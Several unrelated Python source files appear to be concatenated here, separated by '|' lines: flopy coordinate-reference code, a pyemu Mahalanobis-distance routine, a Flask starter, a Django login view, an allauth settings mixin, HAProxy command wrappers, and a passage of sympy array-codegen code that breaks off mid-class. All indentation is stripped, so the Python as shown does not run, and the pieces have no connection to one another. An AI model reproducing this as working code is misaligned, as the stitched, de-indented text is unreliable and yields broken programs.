# def __init__(self, prj=None, esri_wkt=None, epsg=None):
# warnings.warn(
# "crs has been deprecated. Use CRS in shapefile_utils instead.",
# category=DeprecationWarning)
# self.wktstr = None
# if prj is not None:
# with open(prj) as fprj:
# self.wktstr = fprj.read()
# elif esri_wkt is not None:
# self.wktstr = esri_wkt
# elif epsg is not None:
# wktstr = getprj(epsg)
# if wktstr is not None:
# self.wktstr = wktstr
# if self.wktstr is not None:
# self.parse_wkt()
#
# @property
# def crs(self):
# """
# Dict mapping crs attributes to proj4 parameters
# """
# proj = None
# if self.projcs is not None:
# # projection
# if 'mercator' in self.projcs.lower():
# if 'transverse' in self.projcs.lower() or \
# 'tm' in self.projcs.lower():
# proj = 'tmerc'
# else:
# proj = 'merc'
# elif 'utm' in self.projcs.lower() and \
# 'zone' in self.projcs.lower():
# proj = 'utm'
# elif 'stateplane' in self.projcs.lower():
# proj = 'lcc'
# elif 'lambert' and 'conformal' and 'conic' in self.projcs.lower():
# proj = 'lcc'
# elif 'albers' in self.projcs.lower():
# proj = 'aea'
# elif self.projcs is None and self.geogcs is not None:
# proj = 'longlat'
#
# # datum
# datum = None
# if 'NAD' in self.datum.lower() or \
# 'north' in self.datum.lower() and \
# 'america' in self.datum.lower():
# datum = 'nad'
# if '83' in self.datum.lower():
# datum += '83'
# elif '27' in self.datum.lower():
# datum += '27'
# elif '84' in self.datum.lower():
# datum = 'wgs84'
#
# # ellipse
# ellps = None
# if '1866' in self.spheroid_name:
# ellps = 'clrk66'
# elif 'grs' in self.spheroid_name.lower():
# ellps = 'grs80'
# elif 'wgs' in self.spheroid_name.lower():
# ellps = 'wgs84'
#
# # prime meridian
# pm = self.primem[0].lower()
#
# return {'proj': proj,
# 'datum': datum,
# 'ellps': ellps,
# 'a': self.semi_major_axis,
# 'rf': self.inverse_flattening,
# 'lat_0': self.latitude_of_origin,
# 'lat_1': self.standard_parallel_1,
# 'lat_2': self.standard_parallel_2,
# 'lon_0': self.central_meridian,
# 'k_0': self.scale_factor,
# 'x_0': self.false_easting,
# 'y_0': self.false_northing,
# 'units': self.projcs_unit,
# 'zone': self.utm_zone}
#
# @property
# def grid_mapping_attribs(self):
# """
# Map parameters for CF Grid Mappings
# http://http://cfconventions.org/cf-conventions/cf-conventions.html,
# Appendix F: Grid Mappings
# """
# if self.wktstr is not None:
# sp = [p for p in [self.standard_parallel_1,
# self.standard_parallel_2]
# if p is not None]
# sp = sp if len(sp) > 0 else None
# proj = self.crs['proj']
# names = {'aea': 'albers_conical_equal_area',
# 'aeqd': 'azimuthal_equidistant',
# 'laea': 'lambert_azimuthal_equal_area',
# 'longlat': 'latitude_longitude',
# 'lcc': 'lambert_conformal_conic',
# 'merc': 'mercator',
# 'tmerc': 'transverse_mercator',
# 'utm': 'transverse_mercator'}
# attribs = {'grid_mapping_name': names[proj],
# 'semi_major_axis': self.crs['a'],
# 'inverse_flattening': self.crs['rf'],
# 'standard_parallel': sp,
# 'longitude_of_central_meridian': self.crs['lon_0'],
# 'latitude_of_projection_origin': self.crs['lat_0'],
# 'scale_factor_at_projection_origin': self.crs['k_0'],
# 'false_easting': self.crs['x_0'],
# 'false_northing': self.crs['y_0']}
# return {k: v for k, v in attribs.items() if v is not None}
#
# @property
# def proj4(self):
# """
# Not implemented yet
# """
# return None
#
# def parse_wkt(self):
#
# self.projcs = self._gettxt('PROJCS["', '"')
# self.utm_zone = None
# if self.projcs is not None and 'utm' in self.projcs.lower():
# self.utm_zone = self.projcs[-3:].lower().strip('n').strip('s')
# self.geogcs = self._gettxt('GEOGCS["', '"')
# self.datum = self._gettxt('DATUM["', '"')
# tmp = self._getgcsparam('SPHEROID')
# self.spheroid_name = tmp.pop(0)
# self.semi_major_axis = tmp.pop(0)
# self.inverse_flattening = tmp.pop(0)
# self.primem = self._getgcsparam('PRIMEM')
# self.gcs_unit = self._getgcsparam('UNIT')
# self.projection = self._gettxt('PROJECTION["', '"')
# self.latitude_of_origin = self._getvalue('latitude_of_origin')
# self.central_meridian = self._getvalue('central_meridian')
# self.standard_parallel_1 = self._getvalue('standard_parallel_1')
# self.standard_parallel_2 = self._getvalue('standard_parallel_2')
# self.scale_factor = self._getvalue('scale_factor')
# self.false_easting = self._getvalue('false_easting')
# self.false_northing = self._getvalue('false_northing')
# self.projcs_unit = self._getprojcs_unit()
#
# def _gettxt(self, s1, s2):
# s = self.wktstr.lower()
# strt = s.find(s1.lower())
# if strt >= 0: # -1 indicates not found
# strt += len(s1)
# end = s[strt:].find(s2.lower()) + strt
# return self.wktstr[strt:end]
#
# def _getvalue(self, k):
# s = self.wktstr.lower()
# strt = s.find(k.lower())
# if strt >= 0:
# strt += len(k)
# end = s[strt:].find(']') + strt
# try:
# return float(self.wktstr[strt:end].split(',')[1])
# except:
# print(' could not typecast wktstr to a float')
#
# def _getgcsparam(self, txt):
# nvalues = 3 if txt.lower() == 'spheroid' else 2
# tmp = self._gettxt('{}["'.format(txt), ']')
# if tmp is not None:
# tmp = tmp.replace('"', '').split(',')
# name = tmp[0:1]
# values = list(map(float, tmp[1:nvalues]))
# return name + values
# else:
# return [None] * nvalues
#
# def _getprojcs_unit(self):
# if self.projcs is not None:
# tmp = self.wktstr.lower().split('unit["')[-1]
# uname, ufactor = tmp.strip().strip(']').split('",')[0:2]
# ufactor = float(ufactor.split(']')[0].split()[0].split(',')[0])
# return uname, ufactor
# return None, None
# def getprj(epsg, addlocalreference=True, text='esriwkt'):
# """
# Gets projection file (.prj) text for given epsg code from
# spatialreference.org
#
# Parameters
# ----------
# epsg : int
# epsg code for coordinate system
# addlocalreference : boolean
# adds the projection file text associated with epsg to a local
# database, epsgref.json, located in the user's data directory.
#
# References
# ----------
# https://www.epsg-registry.org/
#
# Returns
# -------
# prj : str
# text for a projection (*.prj) file.
#
# """
# warnings.warn("SpatialReference has been deprecated. Use StructuredGrid "
# "instead.", category=DeprecationWarning)
# epsgfile = EpsgRef()
# wktstr = epsgfile.get(epsg)
# if wktstr is None:
# wktstr = get_spatialreference(epsg, text=text)
# if addlocalreference and wktstr is not None:
# epsgfile.add(epsg, wktstr)
# return wktstr
#
# def get_spatialreference(epsg, text='esriwkt'):
# """
# Gets text for given epsg code and text format from spatialreference.org
#
# Fetches the reference text using the url:
# https://spatialreference.org/ref/epsg/<epsg code>/<text>/
#
# See: https://www.epsg-registry.org/
#
# Parameters
# ----------
# epsg : int
# epsg code for coordinate system
# text : str
# string added to url
#
# Returns
# -------
# url : str
#
# """
# from flopy.utils.flopy_io import get_url_text
#
# warnings.warn("SpatialReference has been deprecated. Use StructuredGrid "
# "instead.", category=DeprecationWarning)
#
# epsg_categories = ['epsg', 'esri']
# for cat in epsg_categories:
# url = "{}/ref/{}/{}/{}/".format(srefhttp, cat, epsg, text)
# result = get_url_text(url)
# if result is not None:
# break
# if result is not None:
# return result.replace("\n", "")
# elif result is None and text != 'epsg':
# for cat in epsg_categories:
# error_msg = 'No internet connection or ' + \
# 'epsg code {} '.format(epsg) + \
# 'not found at {}/ref/'.format(srefhttp) + \
# '{}/{}/{}'.format(cat, cat, epsg)
# print(error_msg)
# # epsg code not listed on spatialreference.org
# # may still work with pyproj
# elif text == 'epsg':
# return '+init=epsg:{}'.format(epsg)
#
#
# def getproj4(epsg):
# """
# Get projection file (.prj) text for given epsg code from
# spatialreference.org. See: https://www.epsg-registry.org/
#
# Parameters
# ----------
# epsg : int
# epsg code for coordinate system
#
# Returns
# -------
# prj : str
# text for a projection (*.prj) file.
#
# """
# warnings.warn("SpatialReference has been deprecated. Use StructuredGrid "
# "instead.", category=DeprecationWarning)
#
# return get_spatialreference(epsg, text='proj4')
def get_maha_obs_summary(sim_en,l1_crit_val=6.34,l2_crit_val=9.2):
""" calculate the 1-D and 2-D mahalanobis distance
Args:
sim_en (`pyemu.ObservationEnsemble`): a simulated outputs ensemble
l1_crit_val (`float1): the chi squared critical value for the 1-D
mahalanobis distance. Default is 6.4 (p=0.01,df=1)
l2_crit_val (`float1): the chi squared critical value for the 2-D
mahalanobis distance. Default is 9.2 (p=0.01,df=2)
Returns:
tuple containing
- **pandas.DataFrame**: 1-D subspace squared mahalanobis distances
that exceed the `l1_crit_val` threshold
- **pandas.DataFrame**: 2-D subspace squared mahalanobis distances
that exceed the `l2_crit_val` threshold
Note:
Noise realizations are added to `sim_en` to account for measurement
noise.
"""
if not isinstance(sim_en,pyemu.ObservationEnsemble):
raise Exception("'sim_en' must be a "+\
" pyemu.ObservationEnsemble instance")
if sim_en.pst.nnz_obs < 1:
raise Exception(" at least one non-zero weighted obs is needed")
# process the simulated ensemblet to only have non-zero weighted obs
obs = sim_en.pst.observation_data
nz_names =sim_en.pst.nnz_obs_names
# get the full cov matrix
nz_cov_df = sim_en.covariance_matrix().to_dataframe()
nnz_en = sim_en.loc[:,nz_names].copy()
nz_cov_df = nz_cov_df.loc[nz_names,nz_names]
# get some noise realizations
nnz_en.reseed()
obsmean = obs.loc[nnz_en.columns.values, "obsval"]
noise_en = pyemu.ObservationEnsemble.from_gaussian_draw(sim_en.pst,num_reals=sim_en.shape[0])
noise_en -= obsmean #subtract off the obs val bc we just want the noise
noise_en.index = nnz_en.index
nnz_en += noise_en
#obsval_dict = obs.loc[nnz_en.columns.values,"obsval"].to_dict()
# first calculate the 1-D subspace maha distances
print("calculating L-1 maha distances")
sim_mean = nnz_en.mean()
obs_mean = obs.loc[nnz_en.columns.values,"obsval"]
simvar_inv = 1. / (nnz_en.std()**2)
res_mean = sim_mean - obs_mean
l1_maha_sq_df = res_mean**2 * simvar_inv
l1_maha_sq_df = l1_maha_sq_df.loc[l1_maha_sq_df > l1_crit_val]
# now calculate the 2-D subspace maha distances
print("preparing L-2 maha distance containers")
manager = mp.Manager()
ns = manager.Namespace()
results = manager.dict()
mean = manager.dict(res_mean.to_dict())
var = manager.dict()
cov = manager.dict()
var_arr = np.diag(nz_cov_df.values)
for i1, o1 in enumerate(nz_names):
var[o1] = var_arr[i1]
cov_vals = nz_cov_df.loc[o1, :].values[i1+1:]
ostr_vals = ["{0}_{1}".format(o1, o2) for o2 in nz_names[i1+1:]]
cd = {o:c for o,c in zip(ostr_vals,cov_vals)}
cov.update(cd)
print("starting L-2 maha distance parallel calcs")
#pool = mp.Pool(processes=5)
with mp.get_context("spawn").Pool() as pool:
for i1,o1 in enumerate(nz_names):
o2names = [o2 for o2 in nz_names[i1+1:]]
rresults = [pool.apply_async(_l2_maha_worker,args=(o1,o2names,mean,var,cov,results,l2_crit_val))]
[r.get() for r in rresults]
print("closing pool")
pool.close()
print("joining pool")
pool.join()
#print(results)
#print(len(results),len(ostr_vals))
keys = list(results.keys())
onames1 = [k.split('|')[0] for k in keys]
onames2 = [k.split('|')[1] for k in keys]
l2_maha_sq_vals = [results[k] for k in keys]
l2_maha_sq_df = pd.DataFrame({"obsnme_1":onames1,"obsnme_2":onames2,"sq_distance":l2_maha_sq_vals})
return l1_maha_sq_df,l2_maha_sq_df
def _l2_maha_worker(o1,o2names,mean,var,cov,results,l2_crit_val):
rresults = {}
v1 = var[o1]
c = np.zeros((2, 2))
c[0, 0] = v1
r1 = mean[o1]
for o2 in o2names:
ostr = "{0}_{1}".format(o1,o2)
cv = cov[ostr]
v2 = var[o2]
c[1,1] = v2
c[0,1] = cv
c[1,0] = cv
c_inv = np.linalg.inv(c)
r2 = mean[o2]
r_vec = np.array([r1, r2])
l2_maha_sq_val = np.dot(np.dot(r_vec, c_inv), r_vec.transpose())
if l2_maha_sq_val > l2_crit_val:
rresults[ostr] = l2_maha_sq_val
results.update(rresults)
print(o1,"done")
|
from flask import Flask
from flasgger import Swagger
from api.controller.strip import strip_api
def create_app():
app = Flask(__name__)
app.config['SWAGGER'] = {
'title': 'Flask API Starter Kit',
}
Swagger(app)
app.register_blueprint(strip_api, url_prefix='/api')
return app
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=3003, type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
app = create_app()
app.run(host='0.0.0.0', port=port)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.contrib import auth
from django.contrib.auth.hashers import check_password
from django.views import generic
from django.http import response
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from models import Member
from forms import LoginForm
# Create your views here.
class LoginView(generic.TemplateView):
template_name = 'login.html'
def post(self, request, *args, **kwargs):
l_form = LoginForm(request.POST)
if l_form.is_valid():
email = l_form.cleaned_data['email']
password = l_form.cleaned_data['password']
try:
member = Member.objects.get(email=email)
if check_password(password, member.password):
auth.login(request, member)
ret = {
'code': 200,
'message': _('Login success.'),
'redirect': reverse('member_login')
}
return response.JsonResponse(ret)
else:
ret = {
'code': 403,
'message': _('Password error.')
}
return response.JsonResponse(ret)
except Member.DoesNotExist:
ret = {
'code': 404,
'message': _('Username not exist.')
}
return response.JsonResponse(ret)
else:
context = {
'errors': l_form.errors
}
return render(request, 'login.html', context)
|
from typing import Type
from ._base import ComposedConfiguration, ConfigMixin
class AllauthMixin(ConfigMixin):
"""
Configure Django Allauth.
This requires the django-allauth package to be installed.
"""
@staticmethod
def mutate_configuration(configuration: Type[ComposedConfiguration]) -> None:
configuration.INSTALLED_APPS += [
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
]
# Insert before before auth, so the overridden createsuperuser command is found first
auth_index = configuration.INSTALLED_APPS.index('django.contrib.auth')
configuration.INSTALLED_APPS.insert(
auth_index, 'composed_configuration._allauth_support.apps.AllauthSupportConfig'
)
# auth_style should come before others, to ensure its template overrides are found
configuration.INSTALLED_APPS.insert(0, 'auth_style')
# The sites framework requires this to be set.
# In the unlikely case where a database's pk sequence for the django_site table is not reset,
# the default site object could have a different pk. Then this will need to be overridden
# downstream.
SITE_ID = 1
AUTHENTICATION_BACKENDS = [
# Django's built-in ModelBackend is not necessary, since all users will be
# authenticated by their email address
'allauth.account.auth_backends.AuthenticationBackend',
]
# see configuration documentation at
# https://django-allauth.readthedocs.io/en/latest/configuration.html
# Require email verification, but this can be overridden
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Make Django and Allauth redirects consistent, but both may be overridden
LOGIN_REDIRECT_URL = '/'
ACCOUNT_LOGOUT_REDIRECT_URL = '/'
# Use email as the identifier for login
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
# Set the username as the email
ACCOUNT_ADAPTER = (
'composed_configuration._allauth_support.adapter.EmailAsUsernameAccountAdapter'
)
ACCOUNT_USER_MODEL_USERNAME_FIELD = None
# Quality of life improvements, but may not work if the browser is closed
ACCOUNT_SESSION_REMEMBER = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_LOGIN_ON_PASSWORD_RESET = True
# These will permit GET requests to mutate the user state, but significantly improve usability
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
# This will likely become the default in the future, but enable it now
ACCOUNT_PRESERVE_USERNAME_CASING = False
|
# pylint: disable=locally-disabled, too-few-public-methods, no-self-use, invalid-name
"""cmds.py - Implementations of the different HAProxy commands"""
import re
import csv
import json
from io import StringIO
class Cmd():
"""Cmd - Command base class"""
req_args = []
args = {}
cmdTxt = ""
helpTxt = ""
# pylint: disable=unused-argument
def __init__(self, *args, **kwargs):
"""Argument to the command are given in kwargs only. We ignore *args."""
self.args = kwargs
valid_kwargs = [k for (k, v) in kwargs.items() if v is not None]
if not all([a in valid_kwargs for a in self.req_args]):
raise Exception(f"Wrong number of arguments. Required arguments are: {self.WhatArgs()}")
def WhatArgs(self):
"""Returns a formatted string of arguments to this command."""
return ",".join(self.req_args)
@classmethod
def getHelp(cls):
"""Get formatted help string for this command."""
txtArgs = ",".join(cls.req_args)
if not txtArgs:
txtArgs = "None"
return " ".join((cls.helpTxt, "Arguments: %s" % txtArgs))
def getCmd(self):
"""Gets the command line for this command.
The default behavior is to apply the args dict to cmdTxt
"""
return self.cmdTxt % self.args
def getResult(self, res):
"""Returns raw results gathered from HAProxy"""
if res == '\n':
res = None
return res
def getResultObj(self, res):
"""Returns refined output from HAProxy, packed inside a Python obj i.e. a dict()"""
return res
class setServerAgent(Cmd):
"""Set server agent command."""
cmdTxt = "set server %(backend)s/%(server)s agent %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's agent to a new state."
class setServerHealth(Cmd):
"""Set server health command."""
cmdTxt = "set server %(backend)s/%(server)s health %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's health to a new state."
class setServerState(Cmd):
"""Set server state command."""
cmdTxt = "set server %(backend)s/%(server)s state %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's administrative state to a new state."
class setServerWeight(Cmd):
"""Set server weight command."""
cmdTxt = "set server %(backend)s/%(server)s weight %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's weight to a new state."
class showFBEnds(Cmd):
"""Base class for getting a listing Frontends and Backends"""
switch = ""
cmdTxt = "show stat\r\n"
def getResult(self, res):
return "\n".join(self._getResult(res))
def getResultObj(self, res):
return self._getResult(res)
def _getResult(self, res):
"""Show Frontend/Backends. To do this, we extract info from
the stat command and filter out by a specific
switch (FRONTEND/BACKEND)"""
if not self.switch:
raise Exception("No action specified")
result = []
lines = res.split('\n')
cl = re.compile("^[^,].+," + self.switch.upper() + ",.*$")
for e in lines:
me = re.match(cl, e)
if me:
result.append(e.split(",")[0])
return result
class showFrontends(showFBEnds):
"""Show frontends command."""
switch = "frontend"
helpTxt = "List all Frontends."
class showBackends(showFBEnds):
"""Show backends command."""
switch = "backend"
helpTxt = "List all Backends."
class showInfo(Cmd):
"""Show info HAProxy command"""
cmdTxt = "show info\r\n"
helpTxt = "Show info on HAProxy instance."
def getResultObj(self, res):
resDict = {}
for line in res.split('\n'):
k, v = line.split(':')
resDict[k] = v
return resDict
class showSessions(Cmd):
"""Show sess HAProxy command"""
cmdTxt = "show sess\r\n"
helpTxt = "Show HAProxy sessions."
def getResultObj(self, res):
return res.split('\n')
class baseStat(Cmd):
"""Base class for stats commands."""
def getDict(self, res):
# clean response
res = re.sub(r'^# ', '', res, re.MULTILINE)
res = re.sub(r',\n', '\n', res, re.MULTILINE)
res = re.sub(r',\n\n', '\n', res, re.MULTILINE)
csv_string = StringIO(res)
return csv.DictReader(csv_string, delimiter=',')
def getBootstrapOutput(self, **kwargs):
rows = kwargs['rows']
# search
if kwargs['search']:
filtered_rows = []
for row in rows:
def inner(row):
for k, v in row.items():
if kwargs['search'] in v:
return row
return None
match = inner(row)
if match:
filtered_rows.append(match)
rows = filtered_rows
# sort
rows.sort(key=lambda k: k[kwargs['sort_col']], reverse=True if kwargs['sort_dir'] == 'desc' else False)
# pager
total = len(rows)
pages = [rows[i:i + kwargs['page_rows']] for i in range(0, total, kwargs['page_rows'])]
if pages and (kwargs['page'] > len(pages) or kwargs['page'] < 1):
raise KeyError(f"Current page {kwargs['page']} does not exist. Available pages: {len(pages)}")
page = pages[kwargs['page'] - 1] if pages else []
return json.dumps({
"rows": page,
"total": total,
"rowCount": kwargs['page_rows'],
"current": kwargs['page']
})
class showServers(baseStat):
"""Show all servers. If backend is given, show only servers for this backend. """
cmdTxt = "show stat\r\n"
helpTxt = "Lists all servers. Filter for servers in backend, if set."
def getResult(self, res):
if self.args['output'] == 'json':
return json.dumps(self.getResultObj(res))
if self.args['output'] == 'bootstrap':
rows = self.getResultObj(res)
args = {
"rows": rows,
"page": int(self.args['page']) if self.args['page'] != None else 1,
"page_rows": int(self.args['page_rows']) if self.args['page_rows'] != None else len(rows),
"search": self.args['search'],
"sort_col": self.args['sort_col'] if self.args['sort_col'] else 'id',
"sort_dir": self.args['sort_dir'],
}
return self.getBootstrapOutput(**args)
return self.getResultObj(res)
def getResultObj(self, res):
servers = []
reader = self.getDict(res)
for row in reader:
# show only server
if row['svname'] in ['BACKEND', 'FRONTEND']:
continue
# filter server for given backend
if self.args['backend'] and row['pxname'] != self.args['backend']:
continue
# add id
row['id'] = f"{row['pxname']}/{row['svname']}"
row.move_to_end('id', last=False)
servers.append(dict(row))
return servers
|
import bisect
import itertools
from functools import reduce
from collections import defaultdict
from sympy import Indexed, IndexedBase, Tuple, Sum, Add, S, Integer, diagonalize_vector, DiagMatrix
from sympy.combinatorics import Permutation
from sympy.core.basic import Basic
from sympy.core.compatibility import accumulate, default_sort_key
from sympy.core.mul import Mul
from sympy.core.sympify import _sympify
from sympy.functions.special.tensor_functions import KroneckerDelta
from sympy.matrices.expressions import (MatAdd, MatMul, Trace, Transpose,
MatrixSymbol)
from sympy.matrices.expressions.matexpr import MatrixExpr, MatrixElement
from sympy.tensor.array import NDimArray
class _CodegenArrayAbstract(Basic):
@property
def subranks(self):
"""
Returns the ranks of the objects in the uppermost tensor product inside
the current object. In case no tensor products are contained, return
the atomic ranks.
Examples
========
>>> from sympy.codegen.array_utils import CodegenArrayTensorProduct, CodegenArrayContraction
>>> from sympy import MatrixSymbol
>>> M = MatrixSymbol("M", 3, 3)
>>> N = MatrixSymbol("N", 3, 3)
>>> P = MatrixSymbol("P", 3, 3)
Important: do not confuse the rank of the matrix with the rank of an array.
>>> tp = CodegenArrayTensorProduct(M, N, P)
>>> tp.subranks
[2, 2, 2]
>>> co = CodegenArrayContraction(tp, (1, 2), (3, 4))
>>> co.subranks
[2, 2, 2]
"""
return self._subranks[:]
def subrank(self):
"""
The sum of ``subranks``.
"""
return sum(self.subranks)
@property
def shape(self):
return self._shape
class CodegenArrayContraction(_CodegenArrayAbstract):
r"""
This class is meant to represent contractions of arrays in a form easily
processable by the code printers.
"""
def __new__(cls, expr, *contraction_indices, **kwargs):
contraction_indices = _sort_contraction_indices(contraction_indices)
expr = _sympify(expr)
if len(contraction_indices) == 0:
return expr
if isinstance(expr, CodegenArrayContraction):
return cls._flatten(expr, *contraction_indices)
obj = Basic.__new__(cls, expr, *contraction_indices)
obj._subranks = _get_subranks(expr)
obj._mapping = _get_mapping_from_subranks(obj._subranks)
free_indices_to_position = {i: i for i in range(sum(obj._subranks)) if all([i not in cind for cind in contraction_indices])}
obj._free_indices_to_position = free_indices_to_position
shape = expr.shape
cls._validate(expr, *contraction_indices)
if shape:
shape = tuple(shp for i, shp in enumerate(shape) if not any(i in j for j in contraction_indices))
obj._shape = shape
return obj
def __mul__(self, other):
if other == 1:
return self
else:
raise NotImplementedError("Product of N-dim arrays is not uniquely defined. Use another method.")
def __rmul__(self, other):
if other == 1:
return self
else:
raise NotImplementedError("Product of N-dim arrays is not uniquely defined. Use another method.")
@staticmethod
def _validate(expr, *contraction_indices):
shape = expr.shape
if shape is None:
return
# Check that no contraction happens when the shape is mismatched:
for i in contraction_indices:
if len(set(shape[j] for j in i if shape[j] != -1)) != 1:
raise ValueError("contracting indices of different dimensions")
@classmethod
def _push_indices_down(cls, contraction_indices, indices):
flattened_contraction_indices = [j for i in contraction_indices for j in i]
flattened_contraction_indices.sort()
transform = _build_push_indices_down_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
@classmethod
def _push_indices_up(cls, contraction_indices, indices):
flattened_contraction_indices = [j for i in contraction_indices for j in i]
flattened_contraction_indices.sort()
transform = _build_push_indices_up_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
def split_multiple_contractions(self):
"""
Recognize multiple contractions and attempt at rewriting them as paired-contractions.
"""
from sympy import ask, Q
contraction_indices = self.contraction_indices
if isinstance(self.expr, CodegenArrayTensorProduct):
args = list(self.expr.args)
else:
args = [self.expr]
# TODO: unify API, best location in CodegenArrayTensorProduct
subranks = [get_rank(i) for i in args]
# TODO: unify API
mapping = _get_mapping_from_subranks(subranks)
reverse_mapping = {v:k for k, v in mapping.items()}
new_contraction_indices = []
for indl, links in enumerate(contraction_indices):
if len(links) <= 2:
new_contraction_indices.append(links)
continue
# Check multiple contractions:
#
# Examples:
#
# * `A_ij b_j0 C_jk` ===> `A*DiagMatrix(b)*C`
#
# Care for:
# - matrix being diagonalized (i.e. `A_ii`)
# - vectors being diagonalized (i.e. `a_i0`)
# Also consider the case of diagonal matrices being contracted:
current_dimension = self.expr.shape[links[0]]
tuple_links = [mapping[i] for i in links]
arg_indices, arg_positions = zip(*tuple_links)
args_updates = {}
if len(arg_indices) != len(set(arg_indices)):
# Maybe trace should be supported?
raise NotImplementedError
not_vectors = []
vectors = []
for arg_ind, arg_pos in tuple_links:
mat = args[arg_ind]
other_arg_pos = 1-arg_pos
other_arg_abs = reverse_mapping[arg_ind, other_arg_pos]
if (((1 not in mat.shape) and (not ask(Q.diagonal(mat)))) or
((current_dimension == 1) is True and mat.shape != (1, 1)) or
any([other_arg_abs in l for li, l in enumerate(contraction_indices) if li != indl])
):
not_vectors.append((arg_ind, arg_pos))
continue
args_updates[arg_ind] = diagonalize_vector(mat)
vectors.append((arg_ind, arg_pos))
vectors.append((arg_ind, 1-arg_pos))
if len(not_vectors) > 2:
new_contraction_indices.append(links)
continue
if len(not_vectors) == 0:
new_sequence = vectors[:1] + vectors[2:]
elif len(not_vectors) == 1:
new_sequence = not_vectors[:1] + vectors[:-1]
else:
new_sequence = not_vectors[:1] + vectors + not_vectors[1:]
for i in range(0, len(new_sequence) - 1, 2):
arg1, pos1 = new_sequence[i]
arg2, pos2 = new_sequence[i+1]
if arg1 == arg2:
raise NotImplementedError
continue
abspos1 = reverse_mapping[arg1, pos1]
abspos2 = reverse_mapping[arg2, pos2]
new_contraction_indices.append((abspos1, abspos2))
for ind, newarg in args_updates.items():
args[ind] = newarg
return CodegenArrayContraction(
CodegenArrayTensorProduct(*args),
*new_contraction_indices
)
def flatten_contraction_of_diagonal(self):
if not isinstance(self.expr, CodegenArrayDiagonal):
return self
contraction_down = self.expr._push_indices_down(self.expr.diagonal_indices, self.contraction_indices)
new_contraction_indices = []
diagonal_indices = self.expr.diagonal_indices[:]
for i in contraction_down:
contraction_group = list(i)
for j in i:
diagonal_with = [k for k in diagonal_indices if j in k]
contraction_group.extend([l for k in diagonal_with for l in k])
diagonal_indices = [k for k in diagonal_indices if k not in diagonal_with]
new_contraction_indices.append(sorted(set(contraction_group)))
new_contraction_indices = CodegenArrayDiagonal._push_indices_up(diagonal_indices, new_contraction_indices)
return CodegenArrayContraction(
CodegenArrayDiagonal(
self.expr.expr,
*diagonal_indices
),
*new_contraction_indices
)
@staticmethod
def _get_free_indices_to_position_map(free_indices, contraction_indices):
free_indices_to_position = {}
flattened_contraction_indices = [j for i in contraction_indices for j in i]
counter = 0
for ind in free_indices:
while counter in flattened_contraction_indices:
counter += 1
free_indices_to_position[ind] = counter
counter += 1
return free_indices_to_position
@staticmethod
def _get_index_shifts(expr):
"""
Get the mapping of indices at the positions before the contraction
occurs.
Examples
========
>>> from sympy.codegen.array_utils import CodegenArrayContraction, CodegenArrayTensorProduct
>>> from sympy import MatrixSymbol
>>> M = MatrixSymbol("M", 3, 3)
>>> N = MatrixSymbol("N", 3, 3)
>>> cg = CodegenArrayContraction(CodegenArrayTensorProduct(M, N), [1, 2])
>>> cg._get_index_shifts(cg)
[0, 2]
Indeed, ``cg`` after the contraction has two dimensions, 0 and 1. They
need to be shifted by 0 and 2 to get the corresponding positions before
the contraction (that is, 0 and 3).
"""
inner_contraction_indices = expr.contraction_indices
all_inner = [j for i in inner_contraction_indices for j in i]
all_inner.sort()
# TODO: add API for total rank and cumulative rank:
total_rank = get_rank(expr)
inner_rank = len(all_inner)
outer_rank = total_rank - inner_rank
shifts = [0 for i in range(outer_rank)]
counter = 0
pointer = 0
for i in range(outer_rank):
while pointer < inner_rank and counter >= all_inner[pointer]:
counter += 1
pointer += 1
shifts[i] += pointer
counter += 1
return shifts
@staticmethod
def _convert_outer_indices_to_inner_indices(expr, *outer_contraction_indices):
shifts = CodegenArrayContraction._get_index_shifts(expr)
outer_contraction_indices = tuple(tuple(shifts[j] + j for j in i) for i in outer_contraction_indices)
return outer_contraction_indices
@staticmethod
def _flatten(expr, *outer_contraction_indices):
inner_contraction_indices = expr.contraction_indices
outer_contraction_indices = CodegenArrayContraction._convert_outer_indices_to_inner_indices(expr, *outer_contraction_indices)
contraction_indices = inner_contraction_indices + outer_contraction_indices
return CodegenArrayContraction(expr.expr, *contraction_indices)
def _get_contraction_tuples(self):
r"""
Return tuples containing the argument index and position within the
argument of the index position.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction, CodegenArrayTensorProduct
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> cg = CodegenArrayContraction(CodegenArrayTensorProduct(A, B), (1, 2))
>>> cg._get_contraction_tuples()
[[(0, 1), (1, 0)]]
Here the contraction pair `(1, 2)` meaning that the 2nd and 3rd indices
of the tensor product `A\otimes B` are contracted, has been transformed
into `(0, 1)` and `(1, 0)`, identifying the same indices in a different
notation. `(0, 1)` is the second index (1) of the first argument (i.e.
0 or `A`). `(1, 0)` is the first index (i.e. 0) of the second
argument (i.e. 1 or `B`).
"""
mapping = self._mapping
return [[mapping[j] for j in i] for i in self.contraction_indices]
@staticmethod
def _contraction_tuples_to_contraction_indices(expr, contraction_tuples):
# TODO: check that `expr` has `.subranks`:
ranks = expr.subranks
cumulative_ranks = [0] + list(accumulate(ranks))
return [tuple(cumulative_ranks[j]+k for j, k in i) for i in contraction_tuples]
@property
def free_indices(self):
return self._free_indices[:]
@property
def free_indices_to_position(self):
return dict(self._free_indices_to_position)
@property
def expr(self):
return self.args[0]
@property
